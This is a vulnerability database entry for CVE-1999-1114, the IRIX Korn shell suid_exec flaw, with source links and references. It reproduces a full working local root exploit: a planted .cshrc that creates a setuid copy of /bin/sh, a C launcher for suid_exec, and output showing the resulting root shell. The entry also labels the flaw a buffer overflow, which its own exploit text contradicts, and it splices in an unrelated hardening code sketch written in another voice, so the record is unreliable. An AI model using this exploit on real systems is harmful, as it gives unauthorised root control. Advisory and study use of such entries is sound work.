IRIX Korn Shell (ksh) suid_exec缓冲区溢出漏洞

Vulnerability ID: 1105268    Vulnerability type: Buffer overflow
Published: 1996-12-02    Updated: 2005-05-02
CVE ID: CVE-1999-1114
CNNVD ID: CNNVD-199804-011
Platform: IRIX    CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/19353
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199804-011
|Details
The suid_exec program shipped with the Korn shell (ksh) on IRIX 6.x, and possibly on other operating systems, contains a buffer overflow vulnerability. A local user can exploit it to gain root privileges.
|Exploit
source: http://www.securityfocus.com/bid/467/info

A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with its Irix operating system, versions 5.x and 6.x. suid_exec is part of the Korn shell package and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for that shell, such as a .cshrc. By placing malicious code in a .cshrc and invoking suid_exec appropriately, commands can be executed as root.


% setenv | grep SHELL
SHELL=/bin/tcsh
% mv ~/.cshrc ~/.cshrc.old
% cat > ~/.cshrc
cp /bin/sh /tmp
chmod a+rsx /tmp/sh
^D
% cat > expl.c
#include <unistd.h>
int main(void)
{
    /* suid_exec is handed /bin/su as the "script"; it then starts the
       caller's login shell (tcsh here), which sources the planted ~/.cshrc */
    execl("/sbin/suid_exec", "/bin/su", "/bin/su", (char *)0);
    return 1;
}
^D
% cc expl.c -o expl
% ./expl
Too many ('s.
% ls -l /tmp/sh
-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*
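The flaw shown above is a privileged helper handing control to the caller's login shell, which then sources ~/.cshrc with root privileges. The following C sketch is an added example, not SGI's suid_exec code or its fix, of the pattern a setuid wrapper should follow instead: drop the environment variables that choose the shell and its startup files, pin PATH and SHELL, and exec one fixed interpreter. The function names, the variable list and the use of /bin/sh as the fixed interpreter are assumptions of the example.

```c
#include <string.h>
#include <unistd.h>
/* Variables that steer which shell runs and which startup files it reads.
 * SHELL and HOME are here because a helper that honours them ends up
 * running the caller's ~/.cshrc-style files with its own privileges. */
static const char *const unsafe_vars[] = {
    "SHELL", "HOME", "ENV", "BASH_ENV", "IFS", "PATH",
    "LD_LIBRARY_PATH", "LD_PRELOAD", NULL
};
/* Return 1 if a "NAME=value" entry names a variable the helper must drop. */
int is_unsafe_var(const char *entry)
{
    size_t n = strcspn(entry, "=");
    for (int i = 0; unsafe_vars[i] != NULL; i++)
        if (strlen(unsafe_vars[i]) == n && strncmp(entry, unsafe_vars[i], n) == 0)
            return 1;
    return 0;
}
/* Copy the harmless entries of `inherited` into `out`, then pin PATH and
 * SHELL to fixed values. Returns the entry count (excluding the NULL),
 * or 0 when `cap` cannot hold the result. */
size_t build_safe_env(char *const *inherited, const char **out, size_t cap)
{
    size_t n = 0;
    for (size_t i = 0; inherited[i] != NULL; i++) {
        if (is_unsafe_var(inherited[i]))
            continue;
        if (n + 3 >= cap)           /* room for 2 pinned entries + NULL */
            return 0;
        out[n++] = inherited[i];
    }
    if (n + 2 >= cap)
        return 0;
    out[n++] = "PATH=/usr/bin:/bin";
    out[n++] = "SHELL=/bin/sh";
    out[n] = NULL;
    return n;
}
/* Run `script` through a fixed interpreter with the scrubbed environment
 * instead of the caller's login shell. Only returns if execve() fails. */
int run_script_hardened(const char *script, char *const *inherited)
{
    const char *env[64];
    char *const argv[] = { "sh", "--", (char *)script, NULL };
    if (build_safe_env(inherited, env, sizeof env / sizeof env[0]) == 0)
        return -1;
    execve("/bin/sh", argv, (char *const *)env);
    return -1;
}
```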
|References

XF: ksh-suid_exec (2100), http://xforce.iss.net/static/2100.php
BID: 467, http://www.securityfocus.com/bid/467
CIAC: H-15A, http://ciac.llnl.gov/ciac/bulletins/h-15a.shtml
SGI: 19980405-01-I, ftp://patches.sgi.com/support/free/security/advisories/19980405-01-I
AUSCERT: AA-96.17, ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-96.17.suid_exec.vul
